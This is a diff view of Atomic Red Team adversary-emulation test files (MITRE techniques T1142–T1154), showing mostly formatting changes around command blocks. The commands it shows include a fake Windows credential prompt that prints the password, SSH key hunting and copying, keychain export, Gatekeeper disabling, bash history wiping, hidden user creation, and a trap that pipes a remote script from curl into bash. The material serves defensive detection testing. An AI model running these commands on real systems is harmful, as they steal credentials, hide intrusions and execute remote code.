**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
powershell.exe -command {$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo $cred.GetNetworkCredential().Password;}
```
<br/>
atomics/T1142/T1142.md
+1 -2
View File
@@ -27,8 +27,7 @@ To manage their credentials, users have to use additional credentials to access
**Supported Platforms:** macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
security -h
security find-certificate -a -p > allcerts.pem
security import /tmp/certs.pem -k
atomics/T1144/T1144.md
+1 -2
View File
@@ -24,8 +24,7 @@ Gatekeeper Bypass via command line
|------|-------------|------|---------------|
| app_path | Path to app to be used | Path | myapp.app|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
sudo xattr -r -d com.apple.quarantine #{app_path}
sudo spctl --master-disable
```
atomics/T1145/T1145.md
+4 -8
View File
@@ -29,8 +29,7 @@ File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
echo "ATOMICREDTEAM" > %windir%\cert.key
dir c:\ /b /s .key | findstr /e .key
```
@@ -48,8 +47,7 @@ Discover private SSH keys on a macOS or Linux system.
|------|-------------|------|---------------|
| output_file | Output file containing locations of SSH key files | path | /tmp/keyfile_locations.txt|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
find / -name id_rsa >> #{output_file}
find / -name id_dsa >> #{output_file}
```
@@ -67,8 +65,7 @@ Copy private SSH keys on a Linux system to a staging folder using the `cp` comma
|------|-------------|------|---------------|
| output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
mkdir #{output_folder}
find / -name id_rsa -exec cp --parents {} #{output_folder} \;
find / -name id_dsa -exec cp --parents {} #{output_folder} \;
@@ -87,8 +84,7 @@ Copy private SSH keys on a Linux or macOS system to a staging folder using the `
|------|-------------|------|---------------|
| output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
mkdir #{output_folder}
find / -name id_rsa -exec rsync -R {} #{output_folder} \;
find / -name id_dsa -exec rsync -R {} #{output_folder} \;
atomics/T1146/T1146.md
+6 -12
View File
@@ -25,8 +25,7 @@ Clears bash history via rm
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
rm ~/.bash_history
```
<br/>
@@ -38,8 +37,7 @@ Clears bash history via rm
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
echo "" > ~/.bash_history
```
<br/>
@@ -51,8 +49,7 @@ Clears bash history via cat /dev/null
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
cat /dev/null > ~/.bash_history
```
<br/>
@@ -64,8 +61,7 @@ Clears bash history via a symlink to /dev/null
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
ln -sf /dev/null ~/.bash_history
```
<br/>
@@ -77,8 +73,7 @@ Clears bash history via truncate
**Supported Platforms:** Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
truncate -s0 ~/.bash_history
```
<br/>
@@ -90,8 +85,7 @@ Clears the history of a bunch of different shell types by setting the history si
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
unset HISTFILE
export HISTFILESIZE=0
history -c
atomics/T1147/T1147.md
+1 -2
View File
@@ -20,8 +20,7 @@ Add a hidden user on MacOS
|------|-------------|------|---------------|
| user_name | username to add | string | APT|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
sudo dscl . -create /Users/#{user_name} UniqueID 333
```
<br/>
atomics/T1148/T1148.md
+2 -4
View File
@@ -22,8 +22,7 @@ Disables history collection in shells
|------|-------------|------|---------------|
| evil_command | Command to run after shell history collection is disabled | String | whoami|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
export HISTCONTROL=ignoreboth
ls #{evil_command}
```
@@ -36,8 +35,7 @@ xxx
**Supported Platforms:** macOS, Linux
#### Run it with these steps!
1. export HISTCONTROL=ignoreboth
#### Run it with these steps! 1. export HISTCONTROL=ignoreboth
2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile
3. ls
4. whoami > recon.txt
atomics/T1150/T1150.md
+1 -2
View File
@@ -16,8 +16,7 @@ Modify MacOS plist file in one of two directories
**Supported Platforms:** macOS
#### Run it with these steps!
1. Modify a .plist in
#### Run it with these steps! 1. Modify a .plist in
/Library/Preferences
atomics/T1151/T1151.md
+1 -2
View File
@@ -17,8 +17,7 @@ Space After Filename
**Supported Platforms:** macOS
#### Run it with these steps!
1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt
#### Run it with these steps! 1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt
2. mv execute.txt "execute.txt "
atomics/T1152/T1152.md
+1 -2
View File
@@ -17,8 +17,7 @@ Utilize launchctl
**Supported Platforms:** macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
```
<br/>
atomics/T1153/T1153.md
+2 -4
View File
@@ -19,8 +19,7 @@ Creates a script and executes it using the source command
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
chmod +x /tmp/art.sh
source /tmp/art.sh
@@ -34,8 +33,7 @@ Creates a script and executes it using the source command's dot alias
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
chmod +x /tmp/art.sh
. /tmp/art.sh
atomics/T1154/T1154.md
+1 -2
View File
@@ -17,8 +17,7 @@ After sending a keyboard interrupt (CTRL+C) the script will download and execute
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT
exit
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT

Some files were not shown because too many files have changed in this diff Show More